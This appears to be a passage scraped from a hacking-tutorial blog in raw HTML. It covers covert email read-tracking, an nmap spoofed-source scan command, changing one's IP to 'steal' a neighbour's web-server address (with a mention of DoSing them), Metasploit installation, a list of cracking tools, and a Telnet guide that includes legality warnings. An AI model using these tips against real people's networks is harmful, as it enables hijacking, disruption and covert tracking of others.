0.21in; margin-bottom: 0in;"><br /></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;"><b>4. Using read notify service.</b></span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Using read notify service is an email based service.</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Steps to use Read Notify service is as follows:</span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-size: small;"><span style="font-family: Times, Times New Roman, serif;"><b>a)</b></span><span style="font-family: Times, Times New Roman, serif;">First open the Read Notify website :</span><span style="font-family: Times, Times New Roman, serif;"><b>RCPT</b></span></span></div><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-size: small;"><span style="font-family: Times, Times New Roman, serif;"><b>b)</b></span><span style="font-family: Times, Times New Roman, serif;">Now register on this website and then it will send you confirmation mail. Verify your account.</span></span></div><div style="line-height: 0.21in; margin-bottom: 0.2in;"><span style="font-size: small;"><span style="font-family: Times, Times New Roman, serif;"><b>c)</b></span><span style="font-family: Times, Times New Roman, serif;">Once your account is activated. Do the following steps to use this service:</span></span></div><ol><li><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Compose your email just like you usually would in your own email or web email program.</span></span></div></li><li><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Type: .readnotify.com on the end of your recipients email address (don’t worry, that gets removed before your recipients receive the email). Like this: hackersfind@gmail.com.readnotify.com .</span></span></div></li><li><div style="line-height: 0.21in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Send your email.</span></span></div></li></ol><div style="line-height: 0.21in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">Some things to remember:</span></span></div><ul><li><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">don’t send to and from the same computer.</span></span></div></li><li><div style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Times New Roman;"><span style="font-size: small;"><span style="font-family: Times, Times New Roman, serif;">if your email program ‘auto-completes’ email addresses from your address book, you’ll need to keeptyping over the top of the auto-completed one to add the</span><span style="font-family: Times, Times New Roman, serif;"><b>.readnotify.com</b></span><span style="font-family: Times, Times New Roman, serif;">.</span></span></span></div></li><li><div style="line-height: 0.21in;"><span style="font-family: Times, Times New Roman, serif;"><span style="font-size: small;">if you are cc-ing your email to other readers, you must add tracking to all of them.</span></span></div></li></ul><span style="font-size: small;"><br /></span><span style="color: #eeeeee;"><br /></span></div>

How to Find i.p Address of Remote computer?

This is the article about getting the IP address of the remote computer i.e in terms of hacking getting the IP address of the victim compute...

+ Read more »

Using nmap to change a source address

<div dir="ltr" style="text-align: left;" trbidi="on"><span style="font-family: 'Trebuchet MS', Trebuchet, Verdana, sans-serif; line-height: 0.21in;">Using nmap to change a source address. The commands used are:</span><br /><div align="LEFT" style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Trebuchet MS, Trebuchet, Verdana, sans-serif;">nmap -iflist</span></div><div align="LEFT" style="line-height: 0.21in; margin-bottom: 0in;"><span style="font-family: Trebuchet MS, Trebuchet, Verdana, sans-serif;">...to get a list of available interfaces. When an interface is chosen (in this tutorial, eth0 is chosen) use the name of the interface in the next command:</span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="font-family: Trebuchet MS, Trebuchet, Verdana, sans-serif;">nmap -e eth0 -S 192.168.1.100 192.168.1.109</span></div><div align="LEFT" style="margin-bottom: 0in;"><span style="font-family: Trebuchet MS, Trebuchet, Verdana, sans-serif;">...which will use the eth0 interface and spoof a source IP of 192.168.1.100, while scanning 192.168.1.109. Because the source address is spoofed, the return traffic from the target host will not be routed back to us. Thus, all ports will appear to be closed.</span></div><div align="LEFT" style="margin-bottom: 0in;"><br /></div><div align="LEFT" style="line-height: 0.21in; margin-bottom: 0in;"><br /></div><br /></div>

Using nmap to change a source address

Using nmap to change a source address. The commands used are: nmap -iflist ...to get a list of available interfaces. When an interface is ch...

+ Read more »

How To change your I.P address?

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="text-align: left;"></div><div style="margin-bottom: 0.07in; margin-top: 0.07in;"><span style="font-size: small;">Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.<br /><br /><br />1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".<br /><br />2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:</span></div><div style="margin-bottom: 0.07in; margin-top: 0.07in;"><span style="font-size: small;">Windows IP Configuration:</span><br /><a name='more'></a><span style="font-size: small;"><br />Host Name . . . . . . . . . . . . . . : My Computer Name Here<br />Primary Dns Suffix . . . . . . . . . :<br />Node Type . . . . . . . . . . . . . . .: Unknown<br />IP Routing Enabled. . . . . . . . . : No<br />WINS Proxy Enabled. . . . . . . . : No<br /><br />Ethernet adapter Local Area Connection:<br /><br />Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x<br />Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)<br />Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX<br />Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes<br />Autoconfiguration Enabled . . . . . . . . . : Yes<br />IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx<br />Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0<br />Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x<br />DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx<br />DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx<br />24.xx.xxx.xx<br />24.xx.xxx.xxx<br />Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM<br />Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003 3:43:16 AM<br /><br /><br />This is all the information you will need for now, I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once.<br /><br /><u>III. Changing your IP Address</u><br /><br />To change your IP address first pick any IP you like out of your IP range and remember it or write it down. It is usualy a good idea to make sure the IP is dead (except for what we are going to do later on) so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double clicking on the icon in Network Connections, then select Properties under the General Tab. In the new window that pops up select Internet Protocol (TCP/IP) and click properties, it's under the general tab. In this new window select the General tab and choose "Use the following IP address" and for the IP address enter the IP you would like to use (the one you picked from your subnet earlier) and for the Subnet Mask enter the subnet mask you got when your ran ipconfig /all, same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked, try to refresh a website and if it works you know everything is okay and you are connected. To make sure the change worked type ipconfig again and the IP address should have changed to your new one.<br /><br /><u>IV. DDoS & DoS Protection</u><br /><br />If your firewall shows that you are being DDoSed, this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS), you can protect your self by changing your IP address via the method I described above.<br /><br /><u>V. Web servers & Other Services</u><br /><br />If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself.<br /><br />To "steal" an IP is to basically use the changing IP address method above and picking an IP that someone that is running a web server has in use. Often you will be able to keep that IP at least for some time, other times you wont be able to use it so just keep trying until it works. You your self will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend as its pretty illegal, an your ISP will get pissed ;)</span></div></div>

How To change your I.P address?

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server,...

+ Read more »

how to install metasploit in ubuntu?

<div dir="ltr" style="text-align: left;" trbidi="on"><h2> </h2><h2 class="western"> </h2><h2 class="western" style="text-align: left;"></h2><div style="text-align: left;"> </div><h2 class="western" style="text-align: left;"><span style="font-family: 'Bitstream Charter', serif;"><h2 align="LEFT" class="western"><div style="text-align: left;"><div style="text-align: left;"><span style="font-size: medium;"><span style="font-weight: normal;">(1)First download metasploit latest version from <a href="http://www.rapid7.com/products/metasploit/download.jsp" target="_blank">here</a> for linux.</span></span><br /><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span><span style="font-size: medium;"><span style="font-weight: normal;">(2)next step is move this downloaded file into your home folder. we want to convert run file into executable file. so run following command into your terminal.</span></span><br /><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span><span style="font-size: medium;"><span style="font-weight: normal;">(3) sudo chmod +x metasploit-latest-linux-installer.run</span></span><br /><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span><span style="font-size: medium;"><span style="font-weight: normal;">(4)sudo ./metasploit-latest-linux-installer.run</span></span><br /><span style="font-size: medium;"><span style="font-weight: normal;">after </span></span><span style="font-size: medium; font-weight: normal;">that uncompress process will start &  it will install automatically.</span><br /><span style="font-size: medium;"><span style="font-weight: normal;">follow some basic step & get activaton code.</span></span><br /><span style="font-size: medium;"><span style="font-weight: normal;">open terminal & run following command</span></span><br /><span style="font-size: medium;"><span style="font-weight: normal;"><br /></span></span><span style="font-size: medium;"><span style="font-weight: normal;">(5)msfconcole </span></span><br /><span style="font-size: medium; font-weight: normal;">it will show</span><br /><span style="font-size: medium;"><span style="font-weight: normal;">msf></span></span><br /><div style="font-weight: normal;"><span style="font-size: medium;"><br /></span></div><br /><h4 style="font-size: large; text-align: left;"></h4></div></div></h2></span></h2><span style="font-family: 'Bitstream Charter', serif; font-size: medium;"></span></div>

how to install metasploit in ubuntu?

(1)First download metasploit latest version from here for linux. (2)next step is move this downloaded file into you...

+ Read more »

List of Useful Hacking Tools

<div dir="ltr" style="text-align: left;" trbidi="on"><br />Here i am listing some good hacking free software which is very useful to hack any system.Download from  <a href="http://sectools.org/" target="_blank">HERE</a>.<br /><br />(1)NESSUS-Nessus is one of the most popular and capable vulnerability scanners, particularly for UNIX systems. It was initially free and open source, but they closed the source code in 2005 and removed the free "Registered Feed" version in 2008. It now costs $1,200 per year, which still beats many of its competitors. A free “Home Feed” is also available, though it is limited and only licensed for home network use.<br /><br />Nessus is constantly updated, with more than 46,000 plugins. Key features include remote and local (authenticated) security checks, a client/server architecture with a web-based interface, and an embedded scripting language for writing your own plugins or understanding the existing ones. The open-source version of Nessus was forked by a group of users who still develop it under the OpenVAS name.<br /><br /><a name='more'></a>(2)METASPLOIT-Metasploit took the security world by storm when it was released in 2004. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their list of modules. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality.<br /><br />Metasploit was completely free, but the project was acquired by Rapid7 in 2009 and it soon sprouted commercial variants. The Framework itself is still free and open source, but they now also offer a free-but-limited Community edition, a more advanced Express edition ($3,000 per year per user), and a full-featured Pro edition ($15,000 per user per year). Other paid exploitation tools to consider are Core Impact (more expensive) and Canvas (less).<br /><br />The Metasploit Framework now includes an official Java-based GUI and also Raphael Mudge's excellent Armitage. The Community, Express, and Pro editions have web-based GUIs.<br /><br />(3)AIR-CRACK -Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It implements the best known cracking algorithms to recover wireless keys once enough encrypted packets have been gathered. . The suite comprises over a dozen discrete tools, including airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).<br /><br />(4)JOHN THE RIPPER-John the Ripper is a fast password cracker for UNIX/Linux and Mac OS X.. Its primary purpose is to detect weak Unix passwords, though it supports hashes for many other platforms as well. There is an official free version, a community-enhanced version (with many contributed patches but not as much quality assurance), and an inexpensive pro version.<br /><br />(5)CAIN & ABEL- It`s password cracker tool for windows lke john the ripper (unix).UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.<br /><br />(6)NMAP-Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).<br /><br />YOU CAN DOWNLOAD ALL THIS TOOL FROM BELOW LINK<br /><a href="http://sectools.org/" target="_blank"><span style="color: black;">http://sectools.org/</span></a><br /><br />There are lots of tools,but download which are necessary for you. And use it carefully.</div>

List of Useful Hacking Tools

Here i am listing some good hacking free software which is very useful to hack any system.Download from   HERE . (1)NESSUS-Nessus is one of ...

+ Read more »

What is TELNET ? & How to Use TELNET?

<div dir="ltr" style="text-align: left;" trbidi="on"><br /><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Comic Sans MS"; font-size: 14.0pt; mso-bidi-font-family: "Comic Sans MS";">Telnet: the Number One Hacker Tool</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><br /></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">In this Guide you will learn:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">What is telnet?</span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">How to telnet</span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">How to get telnet accounts <begin11c.shtml></span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Why you might not want to telnet <begin11c.shtml></span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">How to install a telnet server on your home Windows computer <begin11c.shtml></span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">How to turn off a telnet server on your home Linux computer <begin11d.shtml></span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">How to explore computers using telnet <begin11d.shtml></span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Why not use a portscanner instead? <begin11f.shtml></span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">How to break into web sites using telnet <begin11f.shtml></span></u><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">"Where do I type that command?" People ask that all the time when they read my early Guides to (mostly) Harmless Hacking. I wrote those guides back when the Internet was in its infancy and almost everyone in cyberspace used telnet. However, nowadays you might never even hear about telnet, much less use it, unless you are a hacker. So if you are still wondering about telnet, today is your lucky day</span><span style="font-family: 'Times New Roman', serif; font-size: 12pt;">.</span><br /><span style="font-family: 'Times New Roman', serif; font-size: 12pt;"></span><br /><a name='more'></a><br /></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Times New Roman","serif"; font-size: 14.0pt;">What Is Telnet?</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Telnet is a protocol that is most commonly used to log into a remote computer. It also is the single most powerful hacking tool on the planet. With just a telnet client program, you can:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">send email <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">download source code from web sites <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">send unexpected input to webservers that can give you amazing and sometimes illegal results <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">give arbitrary input to many other services on Internet host computers <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">probe the services offered by servers, routers and even people's home computers. <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Times New Roman","serif"; font-size: 14.0pt;">How to Telnet</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Don't know how to telnet? Click the easy telnet links at happyhacker.com and land in the middle of a real hacker wargame! This should work regardless of your computer operating system -- if you have an up to date browser, if your online service provider gives you a true Internet connection, and if your computer is able to telnet at all.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Did those links get you into a telnet session? Were you able to login to a remote computer? If yes, congratulations.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">If not, how can you fix the problem? If no telnet program appeared on your monitor when you clicked these links, perhaps your browser is too ancient to allow telnet. Try installing the latest Netscape browser (<u><http://www.netscape.com/></u>). Or, perhaps your operating system does not include a telnet program. In that case, install or reinstall Windows 95 or 98. If you own a Mac, get the superb Mac OS X or Linux PPC (<u><http://www.linuxppc.com/></u>).<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">If a telnet program came up and failed to connect, possibly the computer you were trying to telnet into was down or just plain no longer in existence. Or, you may be using America Online (or a similar extremely poor online service). If so, your simplest solution may be to get a better online service provider. Determined to hack using AOL? <u>See http://happyhacker.org/aol.shtml <../aol.shtml></u> for some ways to make AOL give you a true Internet connection.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">OK, so you've managed to telnet for the first time. Presumably you don't want to limit yourself to telnet links on web sites. How do you telnet anywhere you want to go?<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">If you have Linux or any other type of Unix (BSD, SCO, Solaris, Sun OS, Irix, Ultrix, etc.) telneting is easy. Just bring up "console" or "shell" (or whatever your GUI calls the command line interface). At the prompt type:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">telnet <hostname or IP address><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Comic Sans MS"; font-size: 14.0pt; mso-bidi-font-family: "Comic Sans MS";">More on Telnet: the Number One Hacker Tool</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Windows 2000 works pretty much like Unix. See Figure 1 for an example of a Win 2000 telnet login. Not shown on the screen was the command "telnet 10.0.0.10", which I gave at the Command (MS-DOS) prompt.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Figure 1: Telnet using Windows 2000<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">If you have Windows 95, 98 or NT, to telnet, bring up the MS-DOS prompt (Start --> Programs --> MS-DOS). <br /><br />Click "connect" then "remote system…". In the host name box place the host name or IP address of the computer to which you wish to telnet. Leave the Port and Term Type boxes alone for now.<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Here is a really important point. Every day people email me complaining that some computer won't let them telnet into it. They ask what they are doing wrong. They aren't doing anything wrong:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Maybe the computer they are trying to reach no longer exists. <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Maybe the computer they are trying to reach doesn't allow telnet logins. For example, whois.internic.net no longer allows telnet logins on port 23 (the default port). <u>Click here to learn how to telnet into whois.internic.net on the right port for that particular server. <../whois.shtml></u> <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Maybe a firewall is blocking them. <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Or maybe they make a telnet connection and the remote computer asks for a user name and password they don't have. Then they email me asking for how to get a login name and password that will work. <o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">Newbie note: The owners or administrators of any Internet host computer decide who gets user names and passwords. Believe it or not, about once a week someone emails me asking what user name and password their own online service provider has assigned them for a telnet login. That's why I'm telling people the obvious -- if you want to telnet into any computer, and you don't have a user name and password, you must ask the owner, administrator of tech support for that system for a user name and password. If they won't give that to you, they don't want you to have it!</span><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><i><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">You can go to jail warning: If you guess the user name and password, or use a computer breakin technique to get or create them, or if someone other than an owner or administrator or a legitimate user on that system gives you a user name and password, it is against the law to use them. Many computer criminals give out user names and passwords that they obtained illegally.</span></i></b></div><div class="MsoNormal" style="margin: 5pt 0cm;"><b><span style="font-family: "Times New Roman","serif"; font-size: 14.0pt;">How to Get Telnet Accounts</span></b><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;"><o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt;">OK, so you want to get legal user names and passwords so you can telnet into other computers. Here are some of the best ways:<o:p></o:p></span></div><div class="MsoNormal" style="margin: 5pt 0cm 5pt 36pt; text-indent: -18pt;"><!--[if !supportLists]--><span style="font-family: Symbol; font-size: 12.0pt; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">         </span></span><!--[endif]--><span 